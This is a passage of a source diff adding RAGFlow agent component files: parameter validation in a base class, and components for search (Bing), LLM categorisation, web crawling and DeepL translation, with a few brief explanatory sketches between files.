+ setattr(param, config_key, sub_params)
160
+
161
+ if not allow_redundant and redundant_attrs:
162
+ raise ValueError(
163
+ f"cpn `{getattr(self, '_name', type(self))}` has redundant parameters: `{[redundant_attrs]}`"
164
+ )
165
+
166
+ return param
167
+
168
+ return _recursive_update_param(param=self, config=conf, depth=0, prefix="")
169
+
170
+ def extract_not_builtin(self):
171
+ def _get_not_builtin_types(obj):
172
+ ret_dict = {}
173
+ for variable in obj.__dict__:
174
+ attr = getattr(obj, variable)
175
+ if attr and type(attr).__name__ not in dir(builtins):
176
+ ret_dict[variable] = _get_not_builtin_types(attr)
177
+
178
+ return ret_dict
179
+
180
+ return _get_not_builtin_types(self)
181
+
182
+ def validate(self):
183
+ self.builtin_types = dir(builtins)
184
+ self.func = {
185
+ "ge": self._greater_equal_than,
186
+ "le": self._less_equal_than,
187
+ "in": self._in,
188
+ "not_in": self._not_in,
189
+ "range": self._range,
190
+ }
191
+ home_dir = os.path.abspath(os.path.dirname(os.path.realpath(__file__)))
192
+ param_validation_path_prefix = home_dir + "/param_validation/"
193
+
194
+ param_name = type(self).__name__
195
+ param_validation_path = "/".join(
196
+ [param_validation_path_prefix, param_name + ".json"]
197
+ )
198
+
199
+ validation_json = None
200
+
201
+ try:
202
+ with open(param_validation_path, "r") as fin:
203
+ validation_json = json.loads(fin.read())
204
+ except BaseException:
205
+ return
206
+
207
+ self._validate_param(self, validation_json)
208
+
209
+ def _validate_param(self, param_obj, validation_json):
210
+ default_section = type(param_obj).__name__
211
+ var_list = param_obj.__dict__
212
+
213
+ for variable in var_list:
214
+ attr = getattr(param_obj, variable)
215
+
216
+ if type(attr).__name__ in self.builtin_types or attr is None:
217
+ if variable not in validation_json:
218
+ continue
219
+
220
+ validation_dict = validation_json[default_section][variable]
221
+ value = getattr(param_obj, variable)
222
+ value_legal = False
223
+
224
+ for op_type in validation_dict:
225
+ if self.func[op_type](value, validation_dict[op_type]):
226
+ value_legal = True
227
+ break
228
+
229
+ if not value_legal:
230
+ raise ValueError(
231
+ "Please check runtime conf, {} = {} does not match user-parameter restriction".format(
232
+ variable, value
233
+ )
234
+ )
235
+
236
+ elif variable in validation_json:
237
+ self._validate_param(attr, validation_json)
238
+
239
+ @staticmethod
240
+ def check_string(param, descr):
241
+ if type(param).__name__ not in ["str"]:
242
+ raise ValueError(
243
+ descr + " {} not supported, should be string type".format(param)
244
+ )
245
+
246
+ @staticmethod
247
+ def check_empty(param, descr):
248
+ if not param:
249
+ raise ValueError(
250
+ descr + " does not support empty value."
251
+ )
252
+
253
+ @staticmethod
254
+ def check_positive_integer(param, descr):
255
+ if type(param).__name__ not in ["int", "long"] or param <= 0:
256
+ raise ValueError(
257
+ descr + " {} not supported, should be positive integer".format(param)
258
+ )
259
+
260
+ @staticmethod
261
+ def check_positive_number(param, descr):
262
+ if type(param).__name__ not in ["float", "int", "long"] or param <= 0:
263
+ raise ValueError(
264
+ descr + " {} not supported, should be positive numeric".format(param)
265
+ )
266
+
267
+ @staticmethod
268
+ def check_nonnegative_number(param, descr):
269
+ if type(param).__name__ not in ["float", "int", "long"] or param < 0:
270
+ raise ValueError(
271
+ descr
272
+ + " {} not supported, should be non-negative numeric".format(param)
273
+ )
274
+
275
+ @staticmethod
276
+ def check_decimal_float(param, descr):
277
+ if type(param).__name__ not in ["float", "int"] or param < 0 or param > 1:
278
+ raise ValueError(
279
+ descr
280
+ + " {} not supported, should be a float number in range [0, 1]".format(
281
+ param
282
+ )
283
+ )
284
+
285
+ @staticmethod
286
+ def check_boolean(param, descr):
287
+ if type(param).__name__ != "bool":
288
+ raise ValueError(
289
+ descr + " {} not supported, should be bool type".format(param)
290
+ )
291
+
292
+ @staticmethod
293
+ def check_open_unit_interval(param, descr):
294
+ if type(param).__name__ not in ["float"] or param <= 0 or param >= 1:
295
+ raise ValueError(
296
+ descr + " should be a numeric number between 0 and 1 exclusively"
297
+ )
298
+
299
+ @staticmethod
300
+ def check_valid_value(param, descr, valid_values):
301
+ if param not in valid_values:
302
+ raise ValueError(
303
+ descr
304
+ + " {} is not supported, it should be in {}".format(param, valid_values)
305
+ )
306
+
307
+ @staticmethod
308
+ def check_defined_type(param, descr, types):
309
+ if type(param).__name__ not in types:
310
+ raise ValueError(
311
+ descr + " {} not supported, should be one of {}".format(param, types)
312
+ )
313
+
314
+ @staticmethod
315
+ def check_and_change_lower(param, valid_list, descr=""):
316
+ if type(param).__name__ != "str":
317
+ raise ValueError(
318
+ descr
319
+ + " {} not supported, should be one of {}".format(param, valid_list)
320
+ )
321
+
322
+ lower_param = param.lower()
323
+ if lower_param in valid_list:
324
+ return lower_param
325
+ else:
326
+ raise ValueError(
327
+ descr
328
+ + " {} not supported, should be one of {}".format(param, valid_list)
329
+ )
330
+
331
+ @staticmethod
332
+ def _greater_equal_than(value, limit):
333
+ return value >= limit - settings.FLOAT_ZERO
334
+
335
+ @staticmethod
336
+ def _less_equal_than(value, limit):
337
+ return value <= limit + settings.FLOAT_ZERO
338
+
339
+ @staticmethod
340
+ def _range(value, ranges):
341
+ in_range = False
342
+ for left_limit, right_limit in ranges:
343
+ if (
344
+ left_limit - settings.FLOAT_ZERO
345
+ <= value
346
+ <= right_limit + settings.FLOAT_ZERO
347
+ ):
348
+ in_range = True
349
+ break
350
+
351
+ return in_range
352
+
353
+ @staticmethod
354
+ def _in(value, right_value_list):
355
+ return value in right_value_list
356
+
357
+ @staticmethod
358
+ def _not_in(value, wrong_value_list):
359
+ return value not in wrong_value_list
360
+
361
+ def _warn_deprecated_param(self, param_name, descr):
362
+ if self._deprecated_params_set.get(param_name):
363
+ logging.warning(
364
+ f"{descr} {param_name} is deprecated and ignored in this version."
365
+ )
366
+
367
+ def _warn_to_deprecate_param(self, param_name, descr, new_param):
368
+ if self._deprecated_params_set.get(param_name):
369
+ logging.warning(
370
+ f"{descr} {param_name} will be deprecated in future release; "
371
+ f"please use {new_param} instead."
372
+ )
373
+ return True
374
+ return False
375
+
376
+
377
+ class ComponentBase(ABC):
378
+ component_name: str
379
+
380
+ def __str__(self):
381
+ """
382
+ {
383
+ "component_name": "Begin",
384
+ "params": {}
385
+ }
386
+ """
387
+ return """{{
388
+ "component_name": "{}",
389
+ "params": {},
390
+ "output": {},
391
+ "inputs": {}
392
+ }}""".format(self.component_name,
393
+ self._param,
394
+ json.dumps(json.loads(str(self._param)).get("output", {}), ensure_ascii=False),
395
+ json.dumps(json.loads(str(self._param)).get("inputs", []), ensure_ascii=False)
396
+ )
397
+
398
+ def __init__(self, canvas, id, param: ComponentParamBase):
399
+ self._canvas = canvas
400
+ self._id = id
401
+ self._param = param
402
+ self._param.check()
403
+
404
+ def get_dependent_components(self):
405
+ cpnts = set([para["component_id"].split("@")[0] for para in self._param.query \
406
+ if para.get("component_id") \
407
+ and para["component_id"].lower().find("answer") < 0 \
408
+ and para["component_id"].lower().find("begin") < 0])
409
+ return list(cpnts)
410
+
411
+ def run(self, history, **kwargs):
412
+ logging.debug("{}, history: {}, kwargs: {}".format(self, json.dumps(history, ensure_ascii=False),
413
+ json.dumps(kwargs, ensure_ascii=False)))
414
+ self._param.debug_inputs = []
415
+ try:
416
+ res = self._run(history, **kwargs)
417
+ self.set_output(res)
418
+ except Exception as e:
419
+ self.set_output(pd.DataFrame([{"content": str(e)}]))
420
+ raise e
421
+
422
+ return res
423
+
424
+ def _run(self, history, **kwargs):
425
+ raise NotImplementedError()
426
+
427
+ def output(self, allow_partial=True) -> Tuple[str, Union[pd.DataFrame, partial]]:
428
+ o = getattr(self._param, self._param.output_var_name)
429
+ if not isinstance(o, partial):
430
+ if not isinstance(o, pd.DataFrame):
431
+ if isinstance(o, list):
432
+ return self._param.output_var_name, pd.DataFrame(o)
433
+ if o is None:
434
+ return self._param.output_var_name, pd.DataFrame()
435
+ return self._param.output_var_name, pd.DataFrame([{"content": str(o)}])
436
+ return self._param.output_var_name, o
437
+
438
+ if allow_partial or not isinstance(o, partial):
439
+ if not isinstance(o, partial) and not isinstance(o, pd.DataFrame):
440
+ return pd.DataFrame(o if isinstance(o, list) else [o])
441
+ return self._param.output_var_name, o
442
+
443
+ outs = None
444
+ for oo in o():
445
+ if not isinstance(oo, pd.DataFrame):
446
+ outs = pd.DataFrame(oo if isinstance(oo, list) else [oo])
447
+ else:
448
+ outs = oo
449
+ return self._param.output_var_name, outs
450
+
451
+ def reset(self):
452
+ setattr(self._param, self._param.output_var_name, None)
453
+ self._param.inputs = []
454
+
455
+ def set_output(self, v):
456
+ setattr(self._param, self._param.output_var_name, v)
457
+
458
+ def get_input(self):
459
+ if self._param.debug_inputs:
460
+ return pd.DataFrame([{"content": v["value"]} for v in self._param.debug_inputs if v.get("value")])
461
+
462
+ reversed_cpnts = []
463
+ if len(self._canvas.path) > 1:
464
+ reversed_cpnts.extend(self._canvas.path[-2])
465
+ reversed_cpnts.extend(self._canvas.path[-1])
466
+
467
+ if self._param.query:
468
+ self._param.inputs = []
469
+ outs = []
470
+ for q in self._param.query:
471
+ if q.get("component_id"):
472
+ if q["component_id"].split("@")[0].lower().find("begin") >= 0:
473
+ cpn_id, key = q["component_id"].split("@")
474
+ for p in self._canvas.get_component(cpn_id)["obj"]._param.query:
475
+ if p["key"] == key:
476
+ outs.append(pd.DataFrame([{"content": p.get("value", "")}]))
477
+ self._param.inputs.append({"component_id": q["component_id"],
478
+ "content": p.get("value", "")})
479
+ break
480
+ else:
481
+ assert False, f"Can't find parameter '{key}' for {cpn_id}"
482
+ continue
483
+
484
+ if q["component_id"].lower().find("answer") == 0:
485
+ txt = []
486
+ for r, c in self._canvas.history[::-1][:self._param.message_history_window_size][::-1]:
487
+ txt.append(f"{r.upper()}: {c}")
488
+ txt = "\n".join(txt)
489
+ self._param.inputs.append({"content": txt, "component_id": q["component_id"]})
490
+ outs.append(pd.DataFrame([{"content": txt}]))
491
+ continue
492
+
493
+ outs.append(self._canvas.get_component(q["component_id"])["obj"].output(allow_partial=False)[1])
494
+ self._param.inputs.append({"component_id": q["component_id"],
495
+ "content": "\n".join(
496
+ [str(d["content"]) for d in outs[-1].to_dict('records')])})
497
+ elif q.get("value"):
498
+ self._param.inputs.append({"component_id": None, "content": q["value"]})
499
+ outs.append(pd.DataFrame([{"content": q["value"]}]))
500
+ if outs:
501
+ df = pd.concat(outs, ignore_index=True)
502
+ if "content" in df:
503
+ df = df.drop_duplicates(subset=['content']).reset_index(drop=True)
504
+ return df
505
+
506
+ upstream_outs = []
507
+
508
+ for u in reversed_cpnts[::-1]:
509
+ if self.get_component_name(u) in ["switch", "concentrator"]:
510
+ continue
511
+ if self.component_name.lower() == "generate" and self.get_component_name(u) == "retrieval":
512
+ o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
513
+ if o is not None:
514
+ o["component_id"] = u
515
+ upstream_outs.append(o)
516
+ continue
517
+ #if self.component_name.lower()!="answer" and u not in self._canvas.get_component(self._id)["upstream"]: continue
518
+ if self.component_name.lower().find("switch") < 0 \
519
+ and self.get_component_name(u) in ["relevant", "categorize"]:
520
+ continue
521
+ if u.lower().find("answer") >= 0:
522
+ for r, c in self._canvas.history[::-1]:
523
+ if r == "user":
524
+ upstream_outs.append(pd.DataFrame([{"content": c, "component_id": u}]))
525
+ break
526
+ break
527
+ if self.component_name.lower().find("answer") >= 0 and self.get_component_name(u) in ["relevant"]:
528
+ continue
529
+ o = self._canvas.get_component(u)["obj"].output(allow_partial=False)[1]
530
+ if o is not None:
531
+ o["component_id"] = u
532
+ upstream_outs.append(o)
533
+ break
534
+
535
+ assert upstream_outs, "Can't infer where this component's input comes from. Please identify whose output is this component's input."
536
+
537
+ df = pd.concat(upstream_outs, ignore_index=True)
538
+ if "content" in df:
539
+ df = df.drop_duplicates(subset=['content']).reset_index(drop=True)
540
+
541
+ self._param.inputs = []
542
+ for _, r in df.iterrows():
543
+ self._param.inputs.append({"component_id": r["component_id"], "content": r["content"]})
544
+
545
+ return df
546
+
547
+ def get_input_elements(self):
548
+ assert self._param.query, "Please identify input parameters first."
549
+ eles = []
550
+ for q in self._param.query:
551
+ if q.get("component_id"):
552
+ cpn_id = q["component_id"]
553
+ if cpn_id.split("@")[0].lower().find("begin") >= 0:
554
+ cpn_id, key = cpn_id.split("@")
555
+ eles.extend(self._canvas.get_component(cpn_id)["obj"]._param.query)
556
+ continue
557
+
558
+ eles.append({"name": self._canvas.get_compnent_name(cpn_id), "key": cpn_id})
559
+ else:
560
+ eles.append({"key": q["value"], "name": q["value"], "value": q["value"]})
561
+ return eles
562
+
563
+ def get_stream_input(self):
564
+ reversed_cpnts = []
565
+ if len(self._canvas.path) > 1:
566
+ reversed_cpnts.extend(self._canvas.path[-2])
567
+ reversed_cpnts.extend(self._canvas.path[-1])
568
+
569
+ for u in reversed_cpnts[::-1]:
570
+ if self.get_component_name(u) in ["switch", "answer"]:
571
+ continue
572
+ return self._canvas.get_component(u)["obj"].output()[1]
573
+
574
+ @staticmethod
575
+ def be_output(v):
576
+ return pd.DataFrame([{"content": v}])
577
+
578
+ def get_component_name(self, cpn_id):
579
+ return self._canvas.get_component(cpn_id)["obj"].component_name.lower()
580
+
581
+ def debug(self, **kwargs):
582
+ return self._run([], **kwargs)
583
+
584
+ def get_parent(self):
585
+ pid = self._canvas.get_component(self._id)["parent_id"]
586
+ return self._canvas.get_component(pid)["obj"]
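As a hedged sketch of the contract base.py defines (the `Echo` component below is hypothetical and only illustrates the pattern): a concrete component pairs a `*Param` class whose `check()` validates its settings with a component whose `_run()` reads upstream text via `get_input()` and returns a one-column DataFrame through `be_output()`.

```python
# Hedged sketch of a minimal custom component against the base classes above.
from abc import ABC
from agent.component.base import ComponentBase, ComponentParamBase


class EchoParam(ComponentParamBase):
    def __init__(self):
        super().__init__()
        self.prefix = "Echo: "

    def check(self):
        # Validation runs when the component is constructed.
        self.check_string(self.prefix, "Echo prefix")


class Echo(ComponentBase, ABC):
    component_name = "Echo"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        text = " - ".join(ans["content"]) if "content" in ans else ""
        return Echo.be_output(self._param.prefix + text)
```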
ragflow-main/agent/component/begin.py ADDED
@@ -0,0 +1,49 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from functools import partial
17
+ import pandas as pd
18
+ from agent.component.base import ComponentBase, ComponentParamBase
19
+
20
+
21
+ class BeginParam(ComponentParamBase):
22
+
23
+ """
24
+ Define the Begin component parameters.
25
+ """
26
+ def __init__(self):
27
+ super().__init__()
28
+ self.prologue = "Hi! I'm your smart assistant. What can I do for you?"
29
+ self.query = []
30
+
31
+ def check(self):
32
+ return True
33
+
34
+
35
+ class Begin(ComponentBase):
36
+ component_name = "Begin"
37
+
38
+ def _run(self, history, **kwargs):
39
+ if kwargs.get("stream"):
40
+ return partial(self.stream_output)
41
+ return pd.DataFrame([{"content": self._param.prologue}])
42
+
43
+ def stream_output(self):
44
+ res = {"content": self._param.prologue}
45
+ yield res
46
+ self.set_output(self.be_output(res))
47
+
48
+
49
+
ragflow-main/agent/component/bing.py ADDED
@@ -0,0 +1,84 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ import requests
19
+ import pandas as pd
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+ class BingParam(ComponentParamBase):
23
+ """
24
+ Define the Bing component parameters.
25
+ """
26
+
27
+ def __init__(self):
28
+ super().__init__()
29
+ self.top_n = 10
30
+ self.channel = "Webpages"
31
+ self.api_key = "YOUR_ACCESS_KEY"
32
+ self.country = "CN"
33
+ self.language = "en"
34
+
35
+ def check(self):
36
+ self.check_positive_integer(self.top_n, "Top N")
37
+ self.check_valid_value(self.channel, "Bing Web Search or Bing News", ["Webpages", "News"])
38
+ self.check_empty(self.api_key, "Bing subscription key")
39
+ self.check_valid_value(self.country, "Bing Country",
40
+ ['AR', 'AU', 'AT', 'BE', 'BR', 'CA', 'CL', 'DK', 'FI', 'FR', 'DE', 'HK', 'IN', 'ID',
41
+ 'IT', 'JP', 'KR', 'MY', 'MX', 'NL', 'NZ', 'NO', 'CN', 'PL', 'PT', 'PH', 'RU', 'SA',
42
+ 'ZA', 'ES', 'SE', 'CH', 'TW', 'TR', 'GB', 'US'])
43
+ self.check_valid_value(self.language, "Bing Languages",
44
+ ['ar', 'eu', 'bn', 'bg', 'ca', 'ns', 'nt', 'hr', 'cs', 'da', 'nl', 'en', 'gb', 'et',
45
+ 'fi', 'fr', 'gl', 'de', 'gu', 'he', 'hi', 'hu', 'is', 'it', 'jp', 'kn', 'ko', 'lv',
46
+ 'lt', 'ms', 'ml', 'mr', 'nb', 'pl', 'br', 'pt', 'pa', 'ro', 'ru', 'sr', 'sk', 'sl',
47
+ 'es', 'sv', 'ta', 'te', 'th', 'tr', 'uk', 'vi'])
48
+
49
+
50
+ class Bing(ComponentBase, ABC):
51
+ component_name = "Bing"
52
+
53
+ def _run(self, history, **kwargs):
54
+ ans = self.get_input()
55
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
56
+ if not ans:
57
+ return Bing.be_output("")
58
+
59
+ try:
60
+ headers = {"Ocp-Apim-Subscription-Key": self._param.api_key, 'Accept-Language': self._param.language}
61
+ params = {"q": ans, "textDecorations": True, "textFormat": "HTML", "cc": self._param.country,
62
+ "answerCount": 1, "promote": self._param.channel}
63
+ if self._param.channel == "Webpages":
64
+ response = requests.get("https://api.bing.microsoft.com/v7.0/search", headers=headers, params=params)
65
+ response.raise_for_status()
66
+ search_results = response.json()
67
+ bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["snippet"]} for i in
68
+ search_results["webPages"]["value"]]
69
+ elif self._param.channel == "News":
70
+ response = requests.get("https://api.bing.microsoft.com/v7.0/news/search", headers=headers,
71
+ params=params)
72
+ response.raise_for_status()
73
+ search_results = response.json()
74
+ bing_res = [{"content": '<a href="' + i["url"] + '">' + i["name"] + '</a> ' + i["description"]} for i
75
+ in search_results['news']['value']]
76
+ except Exception as e:
77
+ return Bing.be_output("**ERROR**: " + str(e))
78
+
79
+ if not bing_res:
80
+ return Bing.be_output("")
81
+
82
+ df = pd.DataFrame(bing_res)
83
+ logging.debug(f"df: {str(df)}")
84
+ return df
ragflow-main/agent/component/categorize.py ADDED
@@ -0,0 +1,98 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ from api.db import LLMType
19
+ from api.db.services.llm_service import LLMBundle
20
+ from agent.component import GenerateParam, Generate
21
+
22
+
23
+ class CategorizeParam(GenerateParam):
24
+
25
+ """
26
+ Define the Categorize component parameters.
27
+ """
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.category_description = {}
31
+ self.prompt = ""
32
+
33
+ def check(self):
34
+ super().check()
35
+ self.check_empty(self.category_description, "[Categorize] Category examples")
36
+ for k, v in self.category_description.items():
37
+ if not k:
38
+ raise ValueError("[Categorize] Category name can not be empty!")
39
+ if not v.get("to"):
40
+ raise ValueError(f"[Categorize] 'To' of category {k} can not be empty!")
41
+
42
+ def get_prompt(self, chat_hist):
43
+ cate_lines = []
44
+ for c, desc in self.category_description.items():
45
+ for line in desc.get("examples", "").split("\n"):
46
+ if not line:
47
+ continue
48
+ cate_lines.append("USER: {}\nCategory: {}".format(line, c))
49
+ descriptions = []
50
+ for c, desc in self.category_description.items():
51
+ if desc.get("description"):
52
+ descriptions.append(
53
+ "--------------------\nCategory: {}\nDescription: {}\n".format(c, desc["description"]))
54
+
55
+ self.prompt = """
56
+ You're a text classifier. You need to categorize the user’s questions into {} categories,
57
+ namely: {}
58
+ Here's description of each category:
59
+ {}
60
+
61
+ You could learn from the following examples:
62
+ {}
63
+ You could learn from the above examples.
64
+ Just mention the category names, no need for any additional words.
65
+
66
+ ---- Real Data ----
67
+ {}
68
+ """.format(
69
+ len(self.category_description.keys()),
70
+ "/".join(list(self.category_description.keys())),
71
+ "\n".join(descriptions),
72
+ "- ".join(cate_lines),
73
+ chat_hist
74
+ )
75
+ return self.prompt
76
+
77
+
78
+ class Categorize(Generate, ABC):
79
+ component_name = "Categorize"
80
+
81
+ def _run(self, history, **kwargs):
82
+ input = self.get_input()
83
+ input = " - ".join(input["content"]) if "content" in input else ""
84
+ chat_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT, self._param.llm_id)
85
+ ans = chat_mdl.chat(self._param.get_prompt(input), [{"role": "user", "content": "\nCategory: "}],
86
+ self._param.gen_conf())
87
+ logging.debug(f"input: {input}, answer: {str(ans)}")
88
+ for c in self._param.category_description.keys():
89
+ if ans.lower().find(c.lower()) >= 0:
90
+ return Categorize.be_output(self._param.category_description[c]["to"])
91
+
92
+ return Categorize.be_output(list(self._param.category_description.items())[-1][1]["to"])
93
+
94
+ def debug(self, **kwargs):
95
+ df = self._run([], **kwargs)
96
+ cpn_id = df.iloc[0, 0]
97
+ return Categorize.be_output(self._canvas.get_compnent_name(cpn_id))
98
+
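A hedged sketch of the `category_description` structure this component validates and prompts with: each category maps to an optional description, newline-separated examples, and the downstream component id in `"to"`. The component ids and model name below are placeholders.

```python
# Hedged sketch of a Categorize configuration; ids and llm_id are illustrative.
categorize_conf = {
    "category_description": {
        "product_question": {
            "description": "Questions about product features or pricing.",
            "examples": "How much does the Pro plan cost?\nDoes it support SSO?",
            "to": "retrieval:0",
        },
        "small_talk": {
            "description": "Greetings and chit-chat.",
            "examples": "hi\nhow are you",
            "to": "generate:0",
        },
    },
    "llm_id": "your-chat-model",
}
```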
ragflow-main/agent/component/concentrator.py ADDED
@@ -0,0 +1,36 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ from agent.component.base import ComponentBase, ComponentParamBase
18
+
19
+
20
+ class ConcentratorParam(ComponentParamBase):
21
+ """
22
+ Define the Concentrator component parameters.
23
+ """
24
+
25
+ def __init__(self):
26
+ super().__init__()
27
+
28
+ def check(self):
29
+ return True
30
+
31
+
32
+ class Concentrator(ComponentBase, ABC):
33
+ component_name = "Concentrator"
34
+
35
+ def _run(self, history, **kwargs):
36
+ return Concentrator.be_output("")
ragflow-main/agent/component/crawler.py ADDED
@@ -0,0 +1,67 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ import asyncio
18
+ from crawl4ai import AsyncWebCrawler
19
+ from agent.component.base import ComponentBase, ComponentParamBase
20
+ from api.utils.web_utils import is_valid_url
21
+
22
+
23
+ class CrawlerParam(ComponentParamBase):
24
+ """
25
+ Define the Crawler component parameters.
26
+ """
27
+
28
+ def __init__(self):
29
+ super().__init__()
30
+ self.proxy = None
31
+ self.extract_type = "markdown"
32
+
33
+ def check(self):
34
+ self.check_valid_value(self.extract_type, "Type of content from the crawler", ['html', 'markdown', 'content'])
35
+
36
+
37
+ class Crawler(ComponentBase, ABC):
38
+ component_name = "Crawler"
39
+
40
+ def _run(self, history, **kwargs):
41
+ ans = self.get_input()
42
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
43
+ if not is_valid_url(ans):
44
+ return Crawler.be_output("URL not valid")
45
+ try:
46
+ result = asyncio.run(self.get_web(ans))
47
+
48
+ return Crawler.be_output(result)
49
+
50
+ except Exception as e:
51
+ return Crawler.be_output(f"An unexpected error occurred: {str(e)}")
52
+
53
+ async def get_web(self, url):
54
+ proxy = self._param.proxy if self._param.proxy else None
55
+ async with AsyncWebCrawler(verbose=True, proxy=proxy) as crawler:
56
+ result = await crawler.arun(
57
+ url=url,
58
+ bypass_cache=True
59
+ )
60
+
61
+ if self._param.extract_type == 'html':
62
+ return result.cleaned_html
63
+ elif self._param.extract_type == 'markdown':
64
+ return result.markdown
65
+ elif self._param.extract_type == 'content':
66
+ return result.extracted_content
67
+ return result.markdown
ragflow-main/agent/component/deepl.py ADDED
@@ -0,0 +1,61 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ from abc import ABC
17
+ from agent.component.base import ComponentBase, ComponentParamBase
18
+ import deepl
19
+
20
+
21
+ class DeepLParam(ComponentParamBase):
22
+ """
23
+ Define the DeepL component parameters.
24
+ """
25
+
26
+ def __init__(self):
27
+ super().__init__()
28
+ self.auth_key = "xxx"
29
+ self.parameters = []
30
+ self.source_lang = 'ZH'
31
+ self.target_lang = 'EN-GB'
32
+
33
+ def check(self):
34
35
+ self.check_valid_value(self.source_lang, "Source language",
36
+ ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN', 'ES', 'ET', 'FI', 'FR', 'HU', 'ID', 'IT',
37
+ 'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT', 'RO', 'RU', 'SK', 'SL', 'SV', 'TR',
38
+ 'UK', 'ZH'])
39
+ self.check_valid_value(self.target_lang, "Target language",
40
+ ['AR', 'BG', 'CS', 'DA', 'DE', 'EL', 'EN-GB', 'EN-US', 'ES', 'ET', 'FI', 'FR', 'HU',
41
+ 'ID', 'IT', 'JA', 'KO', 'LT', 'LV', 'NB', 'NL', 'PL', 'PT-BR', 'PT-PT', 'RO', 'RU',
42
+ 'SK', 'SL', 'SV', 'TR', 'UK', 'ZH'])
43
+
44
+
45
+ class DeepL(ComponentBase, ABC):
46
+ component_name = "DeepL"
47
+
48
+ def _run(self, history, **kwargs):
49
+ ans = self.get_input()
50
+ ans = " - ".join(ans["content"]) if "content" in ans else ""
51
+ if not ans:
52
+ return DeepL.be_output("")
53
+
54
+ try:
55
+ translator = deepl.Translator(self._param.auth_key)
56
+ result = translator.translate_text(ans, source_lang=self._param.source_lang,
57
+ target_lang=self._param.target_lang)
58
+
59
+ return DeepL.be_output(result.text)
60
+ except Exception as e:
61
+ return DeepL.be_output("**Error**:" + str(e))
ragflow-main/agent/component/duckduckgo.py ADDED
@@ -0,0 +1,66 @@
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+ import logging
17
+ from abc import ABC
18
+ from duckduckgo_search import DDGS
19
+ import pandas as pd
20
+ from agent.component.base import ComponentBase, ComponentParamBase
21
+
22
+
23
+ class DuckDuckGoParam(ComponentParamBase):
24
+ """
25
